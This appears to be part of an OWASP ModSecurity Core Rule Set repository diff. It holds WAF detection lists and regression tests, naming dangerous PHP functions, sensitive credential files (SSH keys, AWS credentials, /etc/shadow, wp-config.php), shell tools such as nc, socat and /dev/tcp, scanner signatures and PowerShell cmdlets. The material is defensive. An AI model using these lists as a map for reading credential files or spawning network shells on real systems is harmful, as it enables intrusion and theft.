apache_child_terminate
base64_decode
bzdecompress
call_user_func
call_user_func_array
call_user_method
call_user_method_array
convert_uudecode
file_get_contents
file_put_contents
fsockopen
get_class_methods
get_class_vars
get_defined_constants
get_defined_functions
get_defined_vars
gzdecode
gzinflate
gzuncompress
include_once
invokeargs
pcntl_exec
pcntl_fork
pfsockopen
posix_getcwd
posix_getpwuid
posix_getuid
posix_uname
ReflectionFunction
require_once
shell_exec
str_rot13
sys_get_temp_dir
wp_remote_fopen
wp_remote_get
wp_remote_head
wp_remote_post
wp_remote_request
wp_safe_remote_get
wp_safe_remote_head
wp_safe_remote_post
wp_safe_remote_request
zlib_decode

1264
core/modsecurity/files/coreruleset/rules/php-function-names-933151.data Normal file
View File

File diff suppressed because it is too large Load Diff

19
core/modsecurity/files/coreruleset/rules/php-variables.data Normal file
View File

@@ -0,0 +1,19 @@
$GLOBALS
$HTTP_COOKIE_VARS
$HTTP_ENV_VARS
$HTTP_GET_VARS
$HTTP_POST_FILES
$HTTP_POST_VARS
$HTTP_RAW_POST_DATA
$HTTP_REQUEST_VARS
$HTTP_SERVER_VARS
$_COOKIE
$_ENV
$_FILES
$_GET
$_POST
$_REQUEST
$_SERVER
$_SESSION
$argc
$argv

145
core/modsecurity/files/coreruleset/rules/restricted-files.data Normal file
View File

@@ -0,0 +1,145 @@
# Apache
# (no slash; also guards against old.htaccess, old.htpasswd, etc.)
.htaccess
.htdigest
.htpasswd
# home level dotfiles (keep in sync with lfi-os-files.data)
.aptitude/config
.bash_config
.bash_history
.bash_logout
.bash_profile
.bashrc
.cache/notify-osd.log
.config/odesk/odesk team.conf
.cshrc
.drush/
.gitconfig
.gnupg/
.hplip/hplip.conf
.ksh_history
.lesshst
.lftp/
.lhistory
.lldb-history
.local/share/mc/
.my.cnf
.mysql_history
.nano_history
.node_repl_history
.nsr
.pearrc
.php_history
.pki/
.profile
.psql_history
.python_history
.rediscli_history
.Rhistory
.sh_history
.sqlite_history
.ssh/authorized_keys
.ssh/config
.ssh/id_dsa
.ssh/id_dsa.pub
.ssh/id_rsa
.ssh/id_rsa.pub
.ssh/identity
.ssh/identity.pub
.ssh/known_hosts
.subversion/auth
.subversion/config
.subversion/servers
.tconn/tconn.conf
.tcshrc
.vidalia/vidalia.conf
.viminfo
.vimrc
.xauthority
.zhistory
.zshrc
.zsh_history
.nsconfig
# Version control
/.git/
/.gitignore
/.hg/
/.hgignore
/.svn/
# Wordpress
wp-config.php
wp-config.bak
wp-config.old
wp-config.temp
wp-config.tmp
wp-config.txt
# Symfony
/config/config.yml
/config/config_dev.yml
/config/config_prod.yml
/config/config_test.yml
/config/parameters.yml
/config/routing.yml
/config/security.yml
/config/services.yml
# Drupal
/sites/default/default.settings.php
/sites/default/settings.php
/sites/default/settings.local.php
# Magento
/app/etc/local.xml
# Sublime Text
/sftp-config.json
# ASP.NET
/Web.config
# Node
/package.json
/package-lock.json
/gruntfile.js
/npm-debug.log
/ormconfig.json
/tsconfig.json
/webpack.config.js
/yarn.lock
# Composer
/composer.json
/composer.lock
/packages.json
# dotenv
/.env
# OSX
/.DS_Store
# WS FTP
/.ws_ftp.ini
# common, old network config file
.netrc
# New Top Level dotfiles
.thunderbird/
.vmware/
.kube/
.java/
.anydesk/
.docker/
.npm/
.nvm/
.minikube/
.atom/
.aws/config
.aws/credentials
.cups/
.dbus/
.boto
.gem/
.gnonme/
.gsutil/
# New Per-Project Files
.idea
nbproject/
bower.json
.bowerrc
.eslintrc
.jshintrc
.gitlab-ci.yml
.travis.yml
database.yml
Dockerfile

23
core/modsecurity/files/coreruleset/rules/restricted-upload.data Normal file
View File

@@ -0,0 +1,23 @@
# Apache webserver
.htaccess
.htdigest
.htpasswd
# WordPress configuration file
wp-config.php
# Symfony configuration files
config.yml
config_dev.yml
config_prod.yml
config_test.yml
parameters.yml
routing.yml
security.yml
services.yml
# Drupal configuration files
default.settings.php
settings.php
settings.local.php
# Magento configuration files
local.xml
# dotenv configuration file
.env

8
core/modsecurity/files/coreruleset/rules/scanners-headers.data Normal file
View File

@@ -0,0 +1,8 @@
acunetix-product
(acunetix web vulnerability scanner
acunetix-scanning-agreement
acunetix-user-agreement
myvar=1234
x-ratproxy-loop
bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14
x-scanner

17
core/modsecurity/files/coreruleset/rules/scanners-urls.data Normal file
View File

@@ -0,0 +1,17 @@
/.adSensepostnottherenonobook
/<invalid>hello.html
/actSensepostnottherenonotive
/acunetix-wvs-test-for-some-inexistent-file
/antidisestablishmentarianism
/appscan_fingerprint/mac_address
/arachni-
/cybercop
/nessus_is_probing_you_
/nessustest
/netsparker-
/rfiinc.txt
/thereisnowaythat-you-canbethere
/w3af/remotefileinclude.html
appscan_fingerprint
w00tw00t.at.ISC.SANS.DFind
w00tw00t.at.blackhats.romanian.anti-sec

217
core/modsecurity/files/coreruleset/rules/scanners-user-agents.data Normal file
View File

@@ -0,0 +1,217 @@
# Vulnerability scanners, bruteforce password crackers and exploitation tools
# password cracker
# http://sectools.org/tool/hydra/
(hydra)
# vuln scanner
# http://virtualblueness.net/nasl.html
.nasl
# sql injection
# https://sourceforge.net/projects/absinthe/
absinthe
# email harvesting
# dead? 2004
advanced email extractor
# vuln scanner
# http://www.arachni-scanner.com/
arachni/
autogetcontent
# nessus frontend
# http://www.crossley-nilsen.com/Linux/Bilbo_-_Nessus_WEB/bilbo_-_nessus_web.html
# dead? 2003
bilbo
# Backup File Artifacts Checker
# https://github.com/mazen160/bfac
BFAC
# password cracker
# http://sectools.org/tool/brutus/
brutus
brutus/aet
# sql injection
# https://www.notsosecure.com/bsqlbf-v2-blind-sql-injection-brute-forcer/
bsqlbf
# vuln scanner
# http://freecode.com/projects/cgichk dead? 2001
cgichk
# vuln scanner
# https://sourceforge.net/projects/cisco-torch/
cisco-torch
# vuln scanner
# https://github.com/stasinopoulos/commix
commix
# MS FrontPage vuln scanner?
core-project/1.0
# vuln scanner?
crimscanner/
# vuln scanner
datacha0s
# hidden page scanner
# https://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
dirbuster
# vuln scanner
# https://sourceforge.net/projects/dominohunter/
domino hunter
# vuln scanner - directory traversal fuzzer
# https://github.com/wireghoul/dotdotpwn
dotdotpwn
email extractor
# vuln scanner
fhscan core 1.
floodgate
# "F-Secure Radar is a turnkey vulnerability scanning and management platform."
F-Secure Radar
get-minimal
# Scanner that looks for existing or hidden web objects
# https://github.com/OJ/gobuster
gobuster
# vuln scanner
gootkit auto-rooter scanner
grabber
# vuln scanner
# https://sourceforge.net/projects/grendel/
grendel-scan
# sql injection
havij
# vuln scanner - path disclosure finder
# http://seclists.org/fulldisclosure/2010/Sep/375
inspath
internet ninja
# vuln scanner
jaascois
# vuln scanner
zmeu
# "Mozilla/5.0 Jorgee", vuln scanner
Jorgee
# port scanner
# https://github.com/robertdavidgraham/masscan
masscan
# vuln scanner
# http://www.severus.org/sacha/metis/
metis
# vuln scanner
morfeus fucking scanner
# sql injection
# https://github.com/dtrip/mysqloit
mysqloit
# vuln scanner
# http://www.nstalker.com/
n-stealth
# vuln scanner
# http://www.tenable.com/products/nessus-vulnerability-scanner
nessus
# vuln scanner
# https://www.netsparker.com/web-vulnerability-scanner/
netsparker
# vuln scanner
# https://cirt.net/Nikto2
nikto
# vuln scanner
nmap nse
nmap scripting engine
nmap-nse
# vuln scanner
# http://www.nsauditor.com/
nsauditor
# vuln scanner
# https://github.com/projectdiscovery/nuclei
Nuclei
# vuln scanner
# http://www.openvas.org/
openvas
# sql injection
# http://www.vealtel.com/software/nosec/pangolin/
pangolin
# web proxy & vuln scanner
# https://sourceforge.net/projects/paros/
paros
# phpmyadmin vuln scanner
# dead 2005?
pmafind
prog.customcrawler
# QQGameHall DoS/Virus/Malware/Adware
# https://twitter.com/bagder/status/1244982556958826496?s=20
QQGameHall
# vuln scanner
# https://www.qualys.com/suite/web-application-scanning/
qualys was
s.t.a.l.k.e.r.
security scan
# vuln scanner
# https://sourceforge.net/projects/springenwerk/
springenwerk
# sql injection
# http://www.sqlpowerinjector.com/
sql power injector
# sql injection
# http://sqlmap.org/
sqlmap
# sql injection
# http://sqlninja.sourceforge.net/
sqlninja
# https://www.cyber.nj.gov/threat-profiles/trojan-variants/sysscan
sysscan
# password cracker
# http://foofus.net/goons/jmk/medusa/medusa.html
teh forest lobster
this is an exploit
# vuln scanner?
toata dragostea
toata dragostea mea pentru diavola
# SQL bot
# http://tools.cisco.com/security/center/viewIpsSignature.x?signatureId=22142&signatureSubId=0
uil2pn
# badly scripted UAs (e.g. User-Agent: User-Agent: foo)
user-agent:
# vuln scannr
# https://subgraph.com/vega/
vega/
# vuln scanner
# dead?
voideye
# vuln scanner
# http://w3af.org/
w3af.sf.net
w3af.sourceforge.net
w3af.org
# site scanner (legacy)
# http://www.robotstxt.org/db/webbandit.html
webbandit
# vuln scanner
# http://www8.hp.com/us/en/software-solutions/webinspect-dynamic-analysis-dast/
webinspect
# site scanner
# http://www.scrt.ch/en/attack/downloads/webshag
webshag
# vuln scanner
# dead?
webtrends security analyzer
# vuln scanner
# https://github.com/hhucn/webvulnscan
webvulnscan
# vuln scanner
# https://github.com/xmendez/wfuzz
Wfuzz
# vuln scanner
# https://github.com/ffuf/ffuf
Fuzz Faster U Fool
# web technology scanner
# https://www.morningstarsecurity.com/research/whatweb
whatweb
# vuln scanner
whcc/
# exploit poc
wordpress hash grabber
# exploit
xmlrpc exploit
# wordpress vuln scanner
# https://wpscan.org/
WPScan
# vuln scanner
# https://github.com/mazen160/struts-pwn
struts-pwn
# Detectify website vulnerability scanner
# https://detectify.com/
Detectify
# ZGrab scanner (Mozilla/5.0 zgrab/0.x)
# https://zmap.io
zgrab

28
core/modsecurity/files/coreruleset/rules/scripting-user-agents.data Normal file
View File

@@ -0,0 +1,28 @@
# Generic HTTP clients (popular libraries)
# http library
# http://search.cpan.org/~opera/HTTP-DAV/DAV.pm
dav.pm/v
# http library
# http://search.cpan.org/dist/libwww-perl/lib/LWP.pm
libwww-perl
# generic
mozilla/4.0 (compatible)
mozilla/4.0 (compatible; msie 6.0; win32)
mozilla/5.0 sf/
mozilla/5.0 sf//
# http library
# https://pypi.python.org/pypi/httplib2
python-httplib2
# http library
# http://docs.python-requests.org/en/master/
python-requests
# http library
# https://docs.python.org/2/library/urllib.html
Python-urllib
# http library
# https://github.com/typhoeus/typhoeus
typhoeus
# http library
# https://msdn.microsoft.com/en-us/library/windows/desktop/aa382925%28v=vs.85%29.aspx
winhttp.winhttprequest

80
core/modsecurity/files/coreruleset/rules/sql-errors.data Normal file
View File

@@ -0,0 +1,80 @@
MySqlClient.
Server message
SQL error
Oracle error
JET Database Engine
Procedure or function
SQLite.Exception
[IBM][CLI Driver][DB2/6000]
the used select statements have different number of columns
org.postgresql.util.PSQLException
Access Database Engine
Incorrect syntax near
Syntax error in string in query expression
SQLiteException
' doesn't exist
CLI Driver
on MySQL result index
sybase
com.informix.jdbc
[MySQL][ODBC
Error
has occurred in the vicinity of:
Sintaxis incorrecta cerca de
MySQL server version for the right syntax to use
com.mysql.jdbc.exceptions
You have an error in your SQL syntax near
You have an error in your SQL syntax;
An illegal character has been found in the statement
pg_query() [:
supplied argument is not a valid MySQL
mssql_query()
mysql_fetch_array()
Exception
java.sql.SQLException
Column count doesn't match value count at row
Sybase message
SQL Server
PostgreSQL query failed:
Dynamic SQL Error
System.Data.SQLite.SQLiteException
SQLite/JDBCDriver
Unclosed quotation mark before the character string
System.Data.SqlClient.
Unclosed quotation mark after the character string
System.Data.OleDb.OleDbException
[DM_QUERY_E_SYNTAX]
[SqlException
Unexpected end of command in statement
valid PostgreSQL result
pg_exec() [:
SQL Server
[SQLITE_ERROR]
Microsoft OLE DB Provider for ODBC Drivers
PostgreSQL
org.hsqldb.jdbc
ADODB.Field (0x800A0BCD)
SQL syntax
Exception
System.Data.SqlClient.SqlException
Data type mismatch in criteria expression.
Driver
DB2 SQL error
Sybase message:
ORA-
[Microsoft][ODBC SQL Server Driver]
'80040e14'
Microsoft OLE DB Provider for SQL Server
in query expression
Npgsql.
valid MySQL result
supplied argument is not a valid PostgreSQL result
db2_
Ingres SQLSTATE
Column count doesn't match
Warning
[Microsoft][ODBC Microsoft Access Driver]
[Macromedia][SQLServer JDBC Driver]
<b>Warning</b>: ibase_
Roadhouse.Cms.
DB2 SQL error:

115
core/modsecurity/files/coreruleset/rules/unix-shell.data Normal file
View File

@@ -0,0 +1,115 @@
${CDPATH}
${DIRSTACK}
${HOME}
${HOSTNAME}
${IFS}
${OLDPWD}
${OSTYPE}
${PATH}
${PWD}
$CDPATH
$DIRSTACK
$HOME
$HOSTNAME
$IFS
$OLDPWD
$OSTYPE
$PATH
$PWD
bin/bash
bin/cat
bin/csh
bin/dash
bin/du
bin/echo
bin/grep
bin/less
bin/ls
bin/mknod
bin/more
bin/nc
bin/ps
bin/rbash
bin/sh
bin/sleep
bin/su
bin/tcsh
bin/uname
dev/fd/
dev/null
dev/stderr
dev/stdin
dev/stdout
dev/tcp/
dev/udp/
dev/zero
etc/group
etc/master.passwd
etc/passwd
etc/pwd.db
etc/shadow
etc/shells
etc/spwd.db
proc/self/
usr/bin/awk
usr/bin/base64
usr/bin/cat
usr/bin/cc
usr/bin/clang
usr/bin/clang++
usr/bin/curl
usr/bin/diff
usr/bin/env
usr/bin/fetch
usr/bin/file
usr/bin/find
usr/bin/ftp
usr/bin/gawk
usr/bin/gcc
usr/bin/head
usr/bin/hexdump
usr/bin/id
usr/bin/less
usr/bin/ln
usr/bin/mkfifo
usr/bin/more
usr/bin/nc
usr/bin/ncat
usr/bin/nice
usr/bin/nmap
usr/bin/perl
usr/bin/php
usr/bin/php5
usr/bin/php7
usr/bin/php-cgi
usr/bin/printf
usr/bin/psed
usr/bin/python
usr/bin/python2
usr/bin/python3
usr/bin/ruby
usr/bin/sed
usr/bin/socat
usr/bin/tail
usr/bin/tee
usr/bin/telnet
usr/bin/top
usr/bin/uname
usr/bin/wget
usr/bin/who
usr/bin/whoami
usr/bin/xargs
usr/bin/xxd
usr/bin/yes
usr/local/bin/bash
usr/local/bin/curl
usr/local/bin/ncat
usr/local/bin/nmap
usr/local/bin/perl
usr/local/bin/php
usr/local/bin/python
usr/local/bin/python2
usr/local/bin/python3
usr/local/bin/rbash
usr/local/bin/ruby
usr/local/bin/wget

253
core/modsecurity/files/coreruleset/rules/windows-powershell-commands.data Normal file
View File

@@ -0,0 +1,253 @@
powershell.exe
Add-BitsFile
Add-Computer
Add-Content
Add-History
Add-Member
Add-PSSnapin
Add-Type
Checkpoint-Computer
Clear-Content
Clear-EventLog
Clear-History
Clear-Item
Clear-ItemProperty
Clear-Variable
Compare-Object
Complete-BitsTransfer
Complete-Transaction
Connect-WSMan
ConvertFrom-CSV
ConvertFrom-SecureString
ConvertFrom-StringData
Convert-Path
ConvertTo-CSV
ConvertTo-Html
ConvertTo-SecureString
ConvertTo-XML
Copy-Item
Copy-ItemProperty
Debug-Process
Disable-ComputerRestore
Disable-PSBreakpoint
Disable-PSSessionConfiguration
Disable-WSManCredSSP
Disconnect-WSMan
Enable-ComputerRestore
Enable-PSBreakpoint
Enable-PSRemoting
Enable-PSSessionConfiguration
Enable-WSManCredSSP
Enter-PSSession
Exit-PSSession
Export-Alias
Export-Clixml
Export-Console
Export-Counter
Export-CSV
Export-FormatData
Export-ModuleMember
Export-PSSession
ForEach-Object
Format-Custom
Format-List
Format-Table
Format-Wide
Get-Acl
Get-Alias
Get-AppLockerFileInformation
Get-AppLockerPolicy
Get-AuthenticodeSignature
Get-BitsTransfer
Get-ChildItem
Get-Command
Get-ComputerRestorePoint
Get-Content
Get-Counter
Get-Credential
Get-Culture
Get-Event
Get-EventLog
Get-EventSubscriber
Get-ExecutionPolicy
Get-FormatData
Get-History
Get-Host
Get-HotFix
Get-Item
Get-ItemProperty
Get-Job
Get-Location
Get-Member
Get-Module
Get-PfxCertificate
Get-Process
Get-PSBreakpoint
Get-PSCallStack
Get-PSDrive
Get-PSProvider
Get-PSSession
Get-PSSessionConfiguration
Get-PSSnapin
Get-Random
Get-Service
Get-TraceSource
Get-Transaction
Get-TroubleshootingPack
Get-UICulture
Get-Unique
Get-Variable
Get-WinEvent
Get-WmiObject
Get-WSManCredSSP
Get-WSManInstance
Group-Object
Import-Alias
Import-Clixml
Import-Counter
Import-CSV
Import-LocalizedData
Import-Module
Import-PSSession
Invoke-Command
Invoke-Expression
Invoke-History
Invoke-Item
Invoke-TroubleshootingPack
Invoke-WmiMethod
Invoke-WSManAction
Join-Path
Limit-EventLog
Measure-Command
Measure-Object
Move-Item
Move-ItemProperty
New-Alias
New-AppLockerPolicy
New-Event
New-EventLog
New-Item
New-ItemProperty
New-Module
New-ModuleManifest
New-Object
New-PSDrive
New-PSSession
New-PSSessionOption
New-Service
New-TimeSpan
New-Variable
New-WebServiceProxy
New-WSManInstance
New-WSManSessionOption
Out-Default
Out-File
Out-GridView
Out-Host
Out-Null
Out-Printer
Out-String
Pop-Location
Push-Location
Read-Host
Receive-Job
Register-EngineEvent
Register-ObjectEvent
Register-PSSessionConfiguration
Register-WmiEvent
Remove-BitsTransfer
Remove-Computer
Remove-Event
Remove-EventLog
Remove-Item
Remove-ItemProperty
Remove-Job
Remove-Module
Remove-PSBreakpoint
Remove-PSDrive
Remove-PSSession
Remove-PSSnapin
Remove-Variable
Remove-WmiObject
Remove-WSManInstance
Rename-Item
Rename-ItemProperty
Reset-ComputerMachinePassword
Resolve-Path
Restart-Computer
Restart-Service
Restore-Computer
Resume-BitsTransfer
Resume-Service
Select-Object
Select-String
Select-XML
Send-MailMessage
Set-Acl
Set-Alias
Set-AppLockerPolicy
Set-AuthenticodeSignature
Set-BitsTransfer
Set-Content
Set-Date
Set-ExecutionPolicy
Set-Item
Set-ItemProperty
Set-Location
Set-PSBreakpoint
Set-PSDebug
Set-PSSessionConfiguration
Set-Service
Set-StrictMode
Set-TraceSource
Set-Variable
Set-WmiInstance
Set-WSManInstance
Set-WSManQuickConfig
Show-EventLog
Sort-Object
Split-Path
Start-BitsTransfer
Start-Job
Start-Process
Start-Service
Start-Sleep
Start-Transaction
Start-Transcript
Stop-Computer
Stop-Job
Stop-Process
Stop-Service
Stop-Transcript
Suspend-BitsTransfer
Suspend-Service
Tee-Object
Test-AppLockerPolicy
Test-ComputerSecureChannel
Test-Connection
Test-ModuleManifest
Test-Path
Test-WSMan
Trace-Command
Undo-Transaction
Unregister-Event
Unregister-PSSessionConfiguration
Update-FormatData
Update-List
Update-TypeData
Use-Transaction
Wait-Event
Wait-Job
Wait-Process
Where-Object
Write-Debug
Write-Error
Write-EventLog
Write-Host
Write-Output
Write-Progress
Write-Verbose
Write-Warning
-EncodedCommand
-ExecutionPolicy
-PSConsoleFile

41
core/modsecurity/files/coreruleset/tests/docker-compose.yml Normal file
View File

@@ -0,0 +1,41 @@
version: '3.1'
# Only one of these will be up at a time for now.
# Concurrency will be on the tests folder we have.
services:
modsec2-apache:
image: owasp/modsecurity-crs:v3.2-modsec2-apache
environment:
- SERVERNAME=modsec2-apache
- MODSEC_RULE_ENGINE=DetectionOnly
- PARANOIA=5
volumes:
- ${GITHUB_WORKSPACE}/logs/modsec2-apache:/var/log/apache2
- ${GITHUB_WORKSPACE}/rules:/etc/modsecurity.d/owasp-crs/rules
ports:
- "80:80"
modsec3-apache:
image: owasp/modsecurity-crs:v3.2-modsec3-apache
environment:
- SERVERNAME=modsec3-apache
- MODSEC_RULE_ENGINE=DetectionOnly
- PARANOIA=5
volumes:
- ${GITHUB_WORKSPACE}/logs/modsec3-apache:/var/log/apache2
- ${GITHUB_WORKSPACE}/rules:/etc/modsecurity.d/owasp-crs/rules
ports:
- "80:80"
modsec3-nginx:
image: owasp/modsecurity-crs:v3.2-modsec3-nginx
environment:
- SERVERNAME=modsec3-nginx
- MODSEC_RULE_ENGINE=DetectionOnly
- PARANOIA=5
volumes:
- ${GITHUB_WORKSPACE}/logs/modsec3-nginx:/var/log/nginx
- ${GITHUB_WORKSPACE}/rules:/etc/modsecurity.d/owasp-crs/rules
ports:
- "80:80"

1
core/modsecurity/files/coreruleset/tests/integration/requirements.txt Normal file
View File

@@ -0,0 +1 @@
pytest>=2.9.1

64
core/modsecurity/files/coreruleset/tests/regression/CRS_Tests.py Normal file
View File

@@ -0,0 +1,64 @@
from ftw import ruleset, logchecker, testrunner
import datetime
import pytest
import sys
import re
import os
def test_crs(ruleset, test, logchecker_obj):
runner = testrunner.TestRunner()
for stage in test.stages:
runner.run_stage(stage, logchecker_obj)
class FooLogChecker(logchecker.LogChecker):
def __init__(self, config):
super(FooLogChecker, self).__init__()
self.log_location = config['log_location_linux']
self.log_date_regex = config['log_date_regex']
self.log_date_format = config['log_date_format']
def reverse_readline(self, filename):
with open(filename) as f:
f.seek(0, os.SEEK_END)
position = f.tell()
line = ''
while position >= 0:
f.seek(position)
next_char = f.read(1)
if next_char == "\n":
yield line[::-1]
line = ''
else:
line += next_char
position -= 1
yield line[::-1]
def get_logs(self):
pattern = re.compile(r'%s' % self.log_date_regex)
our_logs = []
for lline in self.reverse_readline(self.log_location):
# Extract dates from each line
match = re.match(pattern, lline)
if match:
log_date = match.group(1)
log_date = datetime.datetime.strptime(
log_date, self.log_date_format)
# NGINX doesn't give us microsecond level by detail, round down.
if "%f" not in self.log_date_format:
ftw_start = self.start.replace(microsecond=0)
else:
ftw_start = self.start
ftw_end = self.end
if log_date <= ftw_end and log_date >= ftw_start:
our_logs.append(lline)
# If our log is from before FTW started stop
if log_date < ftw_start:
break
return our_logs
@pytest.fixture(scope='session')
def logchecker_obj(config):
return FooLogChecker(config)

63
core/modsecurity/files/coreruleset/tests/regression/README.md Normal file
View File

@@ -0,0 +1,63 @@
owasp-crs-regressions
=====================
Introduction
============
Welcome to the OWASP Core Rule Set regression testing suite. This suite is meant to test specific rules in OWASP CRS version 3. The suite is designed to uses preconfigured IDs that are specific to this version of CRS. The tests themselves can be run without CRS and one would expect the same elements to be blocked, however one must override the default Output parameter in the tests.
Installation
============
The OWASP Core Rule Set project was part of the effort to develop FTW, the Framework for Testing WAFs. As a result, we use this project in order to run our regression testing. FTW is designed to use existing Python testing frameworks to allow for easy to read web based testing, provided in YAML. You can install FTW by from the repository (at https://github.com/CRS-support/ftw) or by running pip.
```pip install -r requirements.txt```
This will install FTW as a library. It can also be run natively, see the FTW documentation for more detail.
Requirements
============
There are Three requirements for running the OWASP CRS regressions.
1. You must have ModSecurity specify the location of your error.log, this is done in the config.py file
2. ModSecurity must be in DetectionOnly (or anomaly scoring) mode
3. You must disable IP blocking based on previous events
Note: The test suite compares timezones -- if your test machine and your host machine are in different timezones this can cause bad results
To accomplish 2. and 3. you may use the following rule in your setup.conf:
```
SecAction "id:900005,\
phase:1,\
nolog,\
pass,\
ctl:ruleEngine=DetectionOnly,\
ctl:ruleRemoveById=910000,\
setvar:tx.paranoia_level=4,\
setvar:tx.crs_validate_utf8_encoding=1,\
setvar:tx.arg_name_length=100,\
setvar:tx.arg_length=400"
```
Once these requirements have been met the tests can be run by using pytest.
Running The Tests
=================
On Windows this will look like:
-------------------------------
Single Rule File:
```py.test.exe -v CRS_Tests.py --rule=tests/test.yaml```
The Whole Suite:
```py.test.exe -v CRS_Tests.py --ruledir_recurse=tests/```
On Linux this will look like:
-----------------------------
Single Rule File:
```py.test -v CRS_Tests.py --rule=tests/test.yaml```
The Whole Suite:
```py.test -v CRS_Tests.py --ruledir_recurse=tests/```
Contributions
=============
We'd like to thank Fastly for their help and support in developing these tests.

0
core/modsecurity/files/coreruleset/tests/regression/__init__.py Normal file
View File

14
core/modsecurity/files/coreruleset/tests/regression/config.ini Normal file
View File

@@ -0,0 +1,14 @@
[modsec2-apache]
log_date_format = %a %b %d %H:%M:%S.%f %Y
log_date_regex = \[([A-Z][a-z]{2} [A-z][a-z]{2} \d{1,2} \d{1,2}\:\d{1,2}\:\d{1,2}\.\d+? \d{4})\]
log_location_linux = /var/log/apache2/error.log
[modsec3-apache]
log_date_format = %a %b %d %H:%M:%S.%f %Y
log_date_regex = \[([A-Z][a-z]{2} [A-z][a-z]{2} \d{1,2} \d{1,2}\:\d{1,2}\:\d{1,2}\.\d+? \d{4})\]
log_location_linux = /var/log/apache2/error.log
[modsec3-nginx]
log_date_format = %Y/%m/%d %H:%M:%S
log_date_regex = (\d{4}\/\d{2}\/\d{2} \d{2}:\d{2}:\d{2})
log_location_linux = /var/log/nginx/error.log

17
core/modsecurity/files/coreruleset/tests/regression/conftest.py Normal file
View File

@@ -0,0 +1,17 @@
try:
import ConfigParser as configparser
except ImportError:
import configparser
import os
import pytest
def pytest_addoption(parser):
parser.addoption('--config', action='store', default='modsec2-apache')
@pytest.fixture(scope='session')
def config(request):
cp = configparser.RawConfigParser()
cp.read(os.path.join(os.path.dirname(__file__), 'config.ini'))
return dict(cp.items(request.config.getoption('--config')))

1
core/modsecurity/files/coreruleset/tests/regression/requirements.txt Normal file
View File

@@ -0,0 +1 @@
ftw==1.1.7

149
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml Normal file
View File

@@ -0,0 +1,149 @@
---
meta:
author: "csanders-git"
enabled: true
name: "911100.yaml"
description: "Description"
tests:
-
test_title: 911100-1
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"911100\""
-
test_title: 911100-2
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
port: 80
method: "OPTIONS"
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"911100\""
-
test_title: 911100-3
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "HEAD"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
no_log_contains: "id \"911100\""
-
test_title: 911100-4
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "POST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
Content-Type: "application/x-www-form-urlencoded"
data: "test=value"
output:
no_log_contains: "id \"911100\""
-
test_title: 911100-5
stages:
-
stage:
input:
dest_addr: "127.0.0.1"
method: "TEST"
port: 80
headers:
User-Agent: "ModSecurity CRS 3 Tests"
Host: "localhost"
output:
log_contains: "id \"911100\""
-
test_title: 911100-6
desc: Method is not allowed by policy (911100) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: DELETE
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "911100"
-
test_title: 911100-7
desc: Method is not allowed by policy (911100) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: FOO
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "911100"
-
test_title: 911100-8
desc: Method is not allowed by policy (911100) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv
method: SUBSCRIBE
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "911100"

94
core/modsecurity/files/coreruleset/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml Normal file
View File

@@ -0,0 +1,94 @@
---
meta:
author: csanders-git
description: None
enabled: true
name: 913100.yaml
tests:
-
test_title: 913100-1
desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
Keep-Alive: '300'
Proxy-Connection: keep-alive
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET
CLR 2.0.50727) Havij
method: GET
port: 80
uri: /
version: HTTP/1.0
output:
log_contains: id "913100"
-
test_title: 913100-2
desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions
stages:
-
stage:
input:
dest_addr: 127.0.0.1
headers:
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Accept-Encoding: gzip,deflate
Accept-Language: en-us,en;q=0.5
Host: localhost
